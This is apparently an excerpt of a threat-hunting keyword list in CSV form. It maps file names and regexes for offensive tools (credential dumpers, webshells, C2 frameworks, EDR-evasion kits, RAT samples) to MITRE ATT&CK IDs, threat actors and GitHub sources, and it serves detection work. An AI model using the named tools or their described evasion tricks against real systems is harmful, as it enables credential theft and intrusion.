"*\Forensike.ps1*",".{0,1000}\\Forensike\.ps1.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","15457"
"*\forensike_results.txt*",".{0,1000}\\forensike_results\.txt.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","15458"
"*\ForgeCert.exe*",".{0,1000}\\ForgeCert\.exe.{0,1000}","offensive_tool_keyword","ForgeCert","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","ForgeCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15459"
"*\ForgeCert.exe*",".{0,1000}\\ForgeCert\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","15460"
"*\ForgeCert.exe*",".{0,1000}\\ForgeCert\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","ForgeCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15461"
"*\ForgeCert.exe*",".{0,1000}\\ForgeCert\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","15462"
"*\ForgeCert.pdb*",".{0,1000}\\ForgeCert\.pdb.{0,1000}","offensive_tool_keyword","ForgeCert","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","ForgeCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15463"
"*\ForgeCert.pdb*",".{0,1000}\\ForgeCert\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","ForgeCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","15464"
"*\ForkDump.cpp*",".{0,1000}\\ForkDump\.cpp.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","15465"
"*\ForkDump.exe*",".{0,1000}\\ForkDump\.exe.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","15466"
"*\ForkDump.vcxproj*",".{0,1000}\\ForkDump\.vcxproj.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","15467"
"*\ForkLib.cpp*",".{0,1000}\\ForkLib\.cpp.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","15468"
"*\ForkLib.vcxproj*",".{0,1000}\\ForkLib\.vcxproj.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","15469"
"*\ForkPlayground.sln*",".{0,1000}\\ForkPlayground\.sln.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","15470"
"*\FormatListCommand.cs",".{0,1000}\\FormatListCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15471"
"*\FormatTableCommand.cs",".{0,1000}\\FormatTableCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15472"
"*\FormThief-main*",".{0,1000}\\FormThief\-main.{0,1000}","offensive_tool_keyword","FormThief","Spoofing desktop login applications with WinForms and WPF","T1204.002 - T1056.004 - T1071.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/mlcsec/FormThief","1","0","N/A","N/A","8","2","173","31","2024-02-19T22:40:09Z","2024-02-19T22:34:07Z","15473"
"*\FoxmailDump.cpp*",".{0,1000}\\FoxmailDump\.cpp.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","15474"
"*\Free porn.exe*",".{0,1000}\\Free\sporn\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15475"
"*\freeze.go",".{0,1000}\\freeze\.go","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","0","N/A","N/A","N/A","10","1437","187","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z","15481"
"*\frpc.exe*",".{0,1000}\\frpc\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15492"
"*\FruityC2-Client*",".{0,1000}\\FruityC2\-Client.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","15494"
"*\fscan.exe*",".{0,1000}\\fscan\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15495"
"*\fscan.exe*",".{0,1000}\\fscan\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","15496"
"*\fscan\common\proxy*",".{0,1000}\\fscan\\common\\proxy.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","15497"
"*\fscan\WebScan\pocs\*",".{0,1000}\\fscan\\WebScan\\pocs\\.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","15498"
"*\fscan32.exe*",".{0,1000}\\fscan32\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","15499"
"*\fscan64.exe*",".{0,1000}\\fscan64\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","15500"
"*\fscanarm64.exe*",".{0,1000}\\fscanarm64\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","15501"
"*\fscanarmv6.exe*",".{0,1000}\\fscanarmv6\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","15502"
"*\fscanarmv7.exe*",".{0,1000}\\fscanarmv7\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","15503"
"*\ft.dll*",".{0,1000}\\ft\.dll.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","N/A","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","15504"
"*\ft.exe --*",".{0,1000}\\ft\.exe\s\-\-.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","N/A","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","15505"
"*\ft.exe"" --*",".{0,1000}\\ft\.exe\""\s\-\-.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","N/A","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","15506"
"*\ft.exe"" /install*",".{0,1000}\\ft\.exe\""\s\/install.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","N/A","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","15507"
"*\ft.exe"" /load*",".{0,1000}\\ft\.exe\""\s\/load.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","N/A","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","15508"
"*\ft.exe"" -install*",".{0,1000}\\ft\.exe\""\s\-install.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","N/A","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","15509"
"*\FtpC2.sln*",".{0,1000}\\FtpC2\.sln.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","N/A","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","15510"
"*\FtpC2\*",".{0,1000}\\FtpC2\\.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","0","N/A","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","15511"
"*\FtpC2\FtpC2\*",".{0,1000}\\FtpC2\\FtpC2\\.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","N/A","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","15512"
"*\FTP-Clear-Text-Password-*.txt*",".{0,1000}\\FTP\-Clear\-Text\-Password\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","15513"
"*\fuck.php*",".{0,1000}\\fuck\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","15514"
"*\FudgeC2*",".{0,1000}\\FudgeC2.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","15515"
"*\fullc2_setup_token.txt*",".{0,1000}\\fullc2_setup_token\.txt.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","N/A","N/A","10","9","N/A","N/A","N/A","N/A","15516"
"*\FullPowers.dll*",".{0,1000}\\FullPowers\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15517"
"*\FWUprank.ps1",".{0,1000}\\FWUprank\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15518"
"*\g00nv13.php*",".{0,1000}\\g00nv13\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","15519"
"*\gandcrab.txt*",".{0,1000}\\gandcrab\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15526"
"*\GatewayConsoleExe_d64.exe*",".{0,1000}\\GatewayConsoleExe_d64\.exe.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","N/A","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","15527"
"*\Gay Porn Mailer.exe*",".{0,1000}\\Gay\sPorn\sMailer\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15528"
"*\geacon\tools\BeaconTool\*",".{0,1000}\\geacon\\tools\\BeaconTool\\.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","15529"
"*\gecko-new.php*",".{0,1000}\\gecko\-new\.php.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a  web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","N/A","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","15530"
"*\gecko-old.php*",".{0,1000}\\gecko\-old\.php.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a  web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","N/A","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","15531"
"*\generate_bind_fuegoshell.ps1*",".{0,1000}\\generate_bind_fuegoshell\.ps1.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","15533"
"*\generate_reverse_fuegoshell.ps1*",".{0,1000}\\generate_reverse_fuegoshell\.ps1.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","15534"
"*\get_netconnections.py*",".{0,1000}\\get_netconnections\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15535"
"*\GetADComputers.py*",".{0,1000}\\GetADComputers\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15536"
